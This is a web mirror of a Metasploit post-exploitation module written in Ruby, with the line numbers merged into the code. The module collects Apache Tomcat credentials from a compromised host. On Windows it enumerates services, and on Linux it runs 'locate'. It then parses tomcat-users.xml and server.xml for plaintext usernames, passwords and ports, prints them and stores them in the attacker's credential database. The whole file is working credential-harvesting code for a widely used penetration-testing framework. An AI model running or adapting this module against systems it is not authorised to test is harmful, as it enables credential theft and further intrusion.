CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/multi/gather/tomcat_gather.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Services89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Gather Tomcat Credentials',14'Description' => %q{15This module will attempt to collect credentials from Tomcat services running on the machine.16},17'License' => MSF_LICENSE,18'Author' => [19'Koen Riepe <[email protected]>', # Module author20],21'Platform' => [ 'win', 'linux' ],22'SessionTypes' => [ 'meterpreter' ]23)24)25end2627$username = []28$password = []29$port = []30$paths = []3132def report_creds(user, pass, port)33return if (user.empty? || pass.empty?)3435# Assemble data about the credential objects we will be creating36credential_data = {37origin_type: :session,38post_reference_name: fullname,39private_data: pass,40private_type: :password,41session_id: session_db_id,42username: user,43workspace_id: myworkspace_id44}4546credential_core = create_credential(credential_data)4748if !port.is_a? Integer49port = 808050print_status("Port not an Integer, defaulting to port #{port} for creds database")51end5253login_data = {54core: credential_core,55status: Metasploit::Model::Login::Status::UNTRIED,56address: ::Rex::Socket.getaddress(session.sock.peerhost, true),57port: port,58service_name: 'Tomcat',59protocol: 'tcp',60workspace_id: myworkspace_id61}62create_credential_login(login_data)63end6465def gatherwin66print_status('Windows OS detected, enumerating services')67tomcatHomeArray = []68service_list.each do |service|69if service[:name].downcase.include? 'tomcat'70print_good('Tomcat service found')71tomcatHomeArray.push(service_info(service[:name])[:path].split('\\bin\\')[0])72end73end7475if !tomcatHomeArray.empty?76tomcatHomeArray.each do |tomcat_home|77if tomcat_home.include? '"'78tomcat_home = tomcat_home.split('"')[1]79end8081conf_path = "#{tomcat_home}\\conf\\tomcat-users.xml"8283if exist?(conf_path)84print_status("#{conf_path} found!")85xml = read_file(conf_path).split("\n")8687comment_block = false88xml.each do |line|89if line.include?('<user username=') && !comment_block90$username.push(line.split('<user username="')[1].split('"')[0])91$password.push(line.split('password="')[1].split('"')[0])92$paths.push(conf_path)93elsif line.include?('<!--')94comment_block = true95elsif line.include?(('-->')) && comment_block96comment_block = false97end98end99end100101port_path = "#{tomcat_home}\\conf\\server.xml"102if exist?(port_path)103xml = read_file(port_path).split("\n")104end105comment_block = false106xml.each do |line|107if line.include?('<Connector') && !comment_block108i = 0109while i < $username.count110$port.push(line.split('<Connector port="')[1].split('"')[0].to_i)111i += 1112end113elsif line.include?('<!--')114comment_block = true115elsif line.include?(('-->')) && comment_block116comment_block = false117end118end119end120else121print_status('No Tomcat home can be determined')122end123end124125def gathernix126print_status('Unix OS detected')127user_files = cmd_exec('locate tomcat-users.xml').split("\n")128if !user_files.empty?129user_files.each do |path|130next unless exist?(path)131132print_status("#{path} found")133begin134xml = read_file(path).split("\n")135comment_block = false136xml.each do |line|137if line.include?('<user username=') && !comment_block138$username.push(line.split('<user username="')[1].split('"')[0])139$password.push(line.split('password="')[1].split('"')[0])140$paths.push(path)141elsif line.include?('<!--')142comment_block = true143elsif line.include?(('-->')) && comment_block144comment_block = false145end146end147rescue StandardError148print_error("Cannot open #{path} you probably don't have permission to open the file or parsing failed")149end150end151else152print_status('No tomcat installation has been detected')153end154155port_path = cmd_exec('locate server.xml').split("\n")156if !port_path.empty?157port_path.each do |path|158next unless exist?(path) && path.include?('tomcat')159160print_status("Attempting to extract Tomcat listening ports from #{path}")161begin162xml = read_file(path).split("\n")163comment_block = false164xml.each do |line|165if line.include?('<Connector') && !comment_block166i = 0167while i < $username.count168$port.push(line.split('<Connector port="')[1].split('"')[0].to_i)169i += 1170end171elsif line.include?('<!--')172comment_block = true173elsif line.include?(('-->')) && comment_block174comment_block = false175end176end177rescue StandardError178print_status("Cannot open #{path} you probably don't have permission to open the file or parsing failed")179end180end181else182print_status('Failed to detect tomcat service port')183end184end185186def run187if sysinfo188if sysinfo['OS'].include? 'Windows'189gatherwin190else191gathernix192end193else194print_error('Incompatible session type, sysinfo is not available.')195end196197if $username.empty?198print_status('No user credentials have been found')199end200201i = 0202while i < $username.count203print_good("Username and password found in #{$paths[i]} - #{$username[i]}:#{$password[i]}")204report_creds($username[i], $password[i], $port[i])205i += 1206end207208$username = []209$password = []210$port = []211$paths = []212end213end214215216